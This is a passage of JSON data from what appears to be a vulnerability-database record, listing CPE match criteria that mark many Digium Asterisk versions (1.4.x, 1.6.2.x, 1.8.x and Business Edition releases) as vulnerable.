              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.16:*:*:*:*:*:*:*",
              "matchCriteriaId": "C54C3AAC-4D5D-4661-86AB-6849982E8C67",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.16.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "6F847916-89F1-4AA6-973D-6002C8B54EE8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.16.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "5359815E-671A-4DFD-9E99-8CF903A03C84",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.17:*:*:*:*:*:*:*",
              "matchCriteriaId": "E2EFBC9E-4DCA-43CB-93EB-6807E2383A98",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.18:*:*:*:*:*:*:*",
              "matchCriteriaId": "98755B1B-CAD5-4AC5-8571-52E67C3A8274",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19:*:*:*:*:*:*:*",
              "matchCriteriaId": "C9D8C8FE-3D09-4F60-AD03-9D4439942141",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "902FBE4B-5237-43CD-8EB6-D2CAC0F30879",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "708DCACA-49EC-468D-81EC-CE5367F8A164",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "BA9E3314-7D23-414C-8187-16D807410B62",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "D824ED7B-BAB6-4C0F-A6B0-A75AB072EC0F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "7A01CE63-F834-48B2-826D-2DAD1B4AE8C3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.19.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "88B9CC9D-3DC2-4674-BA52-4C6D4E2056C4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.20:*:*:*:*:*:*:*",
              "matchCriteriaId": "43F1849F-1230-45E7-B6A3-D6FC72EB0F11",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.20:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "873C9C7E-93A3-4269-B19C-AB33A21C1AC7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.20:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "457F2112-7C5E-4953-8F4C-117925D486DA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.20:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "BD15ADD6-D7FA-441A-A9BC-487BCC15F2A0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.20.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "792A8901-B7B8-40E8-9258-6338B72770FD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.21:*:*:*:*:*:*:*",
              "matchCriteriaId": "0E6C8F78-0C00-45A5-8FEB-2A4BD5AC1A37",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.21:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F3E04247-C4EF-4C1B-B879-5C02986950D3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.21:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "5E382FC8-4001-4058-9151-05AE98B4A35E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.21.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "11FECE6B-B6A6-4DDA-9019-9A10B05EC1F8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.21.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "D9813D27-0688-4989-99EB-1DC0F82D59F6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22:*:*:*:*:*:*:*",
              "matchCriteriaId": "D4333904-9D21-4149-965F-F49F0A34BD85",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F7180626-F0FD-46F3-AD52-5C67525C4B46",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "85A1E3A3-C157-4F3D-9477-F63771E7F627",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "FEE739CC-7A9C-489E-BFC0-6257129C043D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "ADC0E947-A95A-44ED-8DED-CC769FF00569",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "DE52BD9F-3728-455C-BC45-1A4DB926FFE9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "1EF82D41-9222-42D3-ADAD-94B4F950C63F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.22.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "2AE9F181-A8E4-4700-A30F-211CDE251606",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23:*:*:*:*:*:*:*",
              "matchCriteriaId": "5B10AE4B-EC2D-4D5B-B842-50F5097A0650",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "83E854D0-17A2-473B-B7E8-41E6447C81DC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "47169133-3854-4D8F-B79E-3CC77A166EF0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "6071601F-CF37-4E66-9D6D-AFC3434C18AB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "2A575824-E005-4820-824A-4875594619E4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "080C7089-5662-4A94-9842-C4A26095DA4B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.23.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "7AE38697-0B16-4032-9234-CA263E4A9885",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.24:*:*:*:*:*:*:*",
              "matchCriteriaId": "DCB18BE2-B073-429C-ABE7-B8305793DAE4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.24:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "FA7216BA-A42F-4ED8-8086-B4FA483FDAB6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.24.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "CB7D2048-CD61-46C0-830B-11976B275783",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.25:*:*:*:*:*:*:*",
              "matchCriteriaId": "8DBA63FE-62AF-4F3D-B30C-550D17C4E35F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.25:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "AD0A0F19-020D-4578-9023-12B0CB646D9C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.25.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "96D5A1E3-FF0B-4C71-AA51-655D7106880D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:*:*:*:*:*:*:*",
              "matchCriteriaId": "E5D425E6-E2E5-4452-9EAA-2697C1155784",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "9855FA26-0930-4AC9-A920-B394F6916349",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "BBA21246-7DF4-41BC-998A-05D38FC97C8F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "EE9A7984-22C9-4296-8E44-C010E67F193D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "51B2C42A-C252-4BD8-A908-8F30C2BF15E7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "2137CEAD-0F19-43C5-A26D-1972564FCD8C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26:rc6:*:*:*:*:*:*",
              "matchCriteriaId": "B7552466-B782-4F16-8561-A2A51E94FED4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "C2F8C82D-3031-4C62-89FA-3BF56EA29727",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "B3074CEA-46BD-4CAD-BF5C-10008A80E434",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.26.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "E6AB8988-FCC6-407A-A7D9-2F7A3A7488B1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.27:*:*:*:*:*:*:*",
              "matchCriteriaId": "E06848DE-6EE1-4FD0-A14F-39D41B2F3E75",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.27:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "CF342950-FDD7-41A9-94D5-EDF41130B61E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.27:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "6E4543AA-3D54-4444-AD1F-381A87A89DA2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.27:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "AF3036DD-261C-4975-A01E-92CD29479588",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.27:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "EF07C116-27DC-4875-9DCF-049E2A8EAEA4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.27:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "88FBC328-538A-4484-A342-1688D9669B9F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.27.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "CBF2301E-F6EF-4D28-82EE-FA1AB8CA9E43",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.28:*:*:*:*:*:*:*",
              "matchCriteriaId": "A53F637C-846A-43FC-BA71-C8571648FA46",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.28:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "E61070F4-1B6B-4814-918E-459DE5119A24",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.29:*:*:*:*:*:*:*",
              "matchCriteriaId": "70664E0F-09CF-42C2-A7A7-E635D022E90D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.29:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "D1E13E1A-C2D4-4E5A-84C8-E6AF061D67C8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.29.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "7E811134-B657-4C50-9AEF-A7F68CA5577A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.30:*:*:*:*:*:*:*",
              "matchCriteriaId": "4C4CD101-F079-4940-AA79-886B69A7A514",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.30:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "B7B828E9-5BE3-4E6F-8048-F2B1F2E929CC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.30:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "75BB2066-74A6-4F89-B54C-35F234DC1F03",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.31:*:*:*:*:*:*:*",
              "matchCriteriaId": "FE522334-BF53-4E34-949B-CD928B59A341",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.31:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "648DEC0E-3CBC-4EA2-AF27-2C518B0762CF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.31:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "B50F4BAE-D00D-4352-B52B-BE1A9FFB6949",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.32:*:*:*:*:*:*:*",
              "matchCriteriaId": "E7A35508-8235-4915-8810-12B2630C82C8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.32:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "63DD4EE5-6F56-41C7-9CB4-16ADF4F63B8F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.33:*:*:*:*:*:*:*",
              "matchCriteriaId": "2347E451-2F89-4EA6-A6E0-22BCB0C8A56E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.33:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "A86F5360-6FE4-4EA2-9208-076E78C842A6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.33:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "3CDFA85B-17A4-4ECC-9922-F5546917B4C0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.33.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "3D7D7DB7-32A7-490E-AED2-C404D371E7C2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.34:*:*:*:*:*:*:*",
              "matchCriteriaId": "A03632BC-CA0F-42BD-8839-A72DB146A4A6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.34:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "9DC4EF64-6A1D-47CB-AC07-48CABB612DCE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.34:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "68C00FEF-7850-48F4-8122-4211D080B508",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.35:*:*:*:*:*:*:*",
              "matchCriteriaId": "D3A48F07-42E1-47E9-94EA-44D20A0BAC3F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.35:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "87D16470-5892-4289-BB35-B69100BCA31E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.36:*:*:*:*:*:*:*",
              "matchCriteriaId": "15E71BD7-83D1-4E2B-AD40-BB6B53056C89",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.36:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "87FDE2E2-5F08-43EF-BBD8-7DCCC0C98870",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.37:*:*:*:*:*:*:*",
              "matchCriteriaId": "347E9D8C-A372-41F2-AB48-FFCAB454C9C8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.37:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "74F67E57-1DD0-4850-8D7E-7A9748BD106C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.38:*:*:*:*:*:*:*",
              "matchCriteriaId": "B208C056-B567-4BEE-A9B7-AEB394341D5D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.38:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "A0C3A2D4-07A9-4D28-AC18-03523E9FF34A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.39:*:*:*:*:*:*:*",
              "matchCriteriaId": "E6516E0F-9F60-4D20-88D3-B9CD8DC93062",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.39:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "22147B91-45A4-4834-AC8D-2DC17A706BEF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.39.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "677C10DE-46D8-4EF1-BF22-63F3AE37CBC2",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "1F8B700A-FACB-4BC8-9DF2-972DC63D852B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "FFD31B9B-2F43-4637-BE56-47A807384BF3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "E6450D6B-C907-49E6-9788-E4029C09285F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "DDB0432E-024A-4C0C-87FF-448E513D2834",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "D6A6A343-FEA2-49E5-9858-455AE3B29470",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc6:*:*:*:*:*:*",
              "matchCriteriaId": "D57B94E3-EA37-466C-ADC4-5180D4502FDD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc7:*:*:*:*:*:*",
              "matchCriteriaId": "64D35A89-6B21-4770-AA0F-424C5C91A254",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.0:rc8:*:*:*:*:*:*",
              "matchCriteriaId": "14817302-A34A-4980-B148-AEB4B3B49BE3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "61FDFA96-E62A-413B-9846-F51F1F7349EC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.1:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "DA924386-49F6-4371-B975-B1473EEA12F0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "B74A1B99-8901-4690-B994-1DAD3EFA5ABB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.3:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "4253C7DD-3588-4B35-B96D-C027133BE93F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "24AE11DB-16D3-42BF-BC64-E8982107D35B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "53841D77-926C-4362-BC85-BD8B6AC4391D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "F98FD6E6-EDE9-437D-B7C2-2DB65B73D230",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.6:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "4BA6CA77-D358-4623-8400-78EFC47ADB7C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.6:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "B4E62DAB-45E0-4EAA-8E45-6D3757A679D5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.15:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "1355578C-B384-401A-9123-2789CBECAD0B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.16:*:*:*:*:*:*:*",
              "matchCriteriaId": "3491F8DB-A162-4608-B5F9-5401FE058CEB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.16:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "C52730A8-D96E-46C1-8905-1D78A93E9C84",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.2.16.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "C6E5CD17-B14A-4BDB-BA75-261344FF6F25",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F6344E43-E8AA-4340-B3A7-72F5D6A5D184",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "4C170C1C-909D-4439-91B5-DB1A9CD150C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "EE821BE5-B1D3-4854-A700-3A83E5F15724",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta3:*:*:*:*:*:*",
              "matchCriteriaId": "149C57CA-0B4B-4220-87FC-432418D1C393",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta4:*:*:*:*:*:*",
              "matchCriteriaId": "035595D5-BBEC-4D85-AD7A-A2C932D2BA70",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:beta5:*:*:*:*:*:*",
              "matchCriteriaId": "6DAF5655-F09F-47F8-AFA6-4B95F77A57F8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "F8E001D8-0A7B-4FDD-88E3-E124ED32B81C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "9D5CFFBD-785F-4417-A54A-F3565FD6E736",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "D30EF999-92D1-4B19-8E32-1E4B35DE4EA1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "A67D156B-9C43-444F-ADEC-B21D99D1433C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "893EB152-6444-43DB-8714-9735354C873A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F8447EE7-A834-41D7-9204-07BD3752870C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "3C04F2C9-5672-42F2-B664-A3EE4C954C29",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "33465668-4C91-4619-960A-D26D77853E53",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "CAD08674-0B44-44EA-940B-6812E2D5077D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "EEE87710-A129-43AA-BA08-8001848975FE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "8F582C6E-5DA0-4D72-A40E-66BDBC5CF2B7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.8.2.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "2E7CEBB8-01B3-4A05-AFE8-37A143C9833E",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.1.0:beta7:business:*:*:*:*:*",
              "matchCriteriaId": "1C4E15BB-71AB-4936-9CA7-E844572A3953",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.1.0:beta8:business:*:*:*:*:*",
              "matchCriteriaId": "EE5823E1-5BFF-44E0-B8DD-4D994073DC1B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.1.6:-:business:*:*:*:*:*",
              "matchCriteriaId": "E6C147EF-0C39-4979-A4F6-C0BE288F083F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.1.6.1:-:business:*:*:*:*:*",
              "matchCriteriaId": "0C1A8352-DE70-4D4E-BC4D-8EABE5431646",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.1.6.2:-:business:*:*:*:*:*",
              "matchCriteriaId": "615D7356-E9DD-4149-B1BE-D3C3475A8841",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.1.8.0:-:business:*:*:*:*:*",
              "matchCriteriaId": "0628E34F-1A60-416D-A29C-EA28E8CC2430",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.1.8.1:-:business:*:*:*:*:*",
              "matchCriteriaId": "5F54511A-A2A9-4038-9D7D-2283A6709DB8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.2.3:-:business:*:*:*:*:*",
              "matchCriteriaId": "3FA908BA-BEF8-44A5-AC95-E7CF020D0C94",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.3.0:-:business:*:*:*:*:*",
              "matchCriteriaId": "78E8936C-033B-49E6-BB39-D5BBBC80EB55",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.3.1.0:-:business:*:*:*:*:*",
              "matchCriteriaId": "5D05D04F-CD6C-4A73-885C-306D7A5CC7C4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.3.1.1:-:business:*:*:*:*:*",
              "matchCriteriaId": "3805B5F3-A4CD-469F-9F8A-A271A79A2B7C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.3.2.2:-:business:*:*:*:*:*",
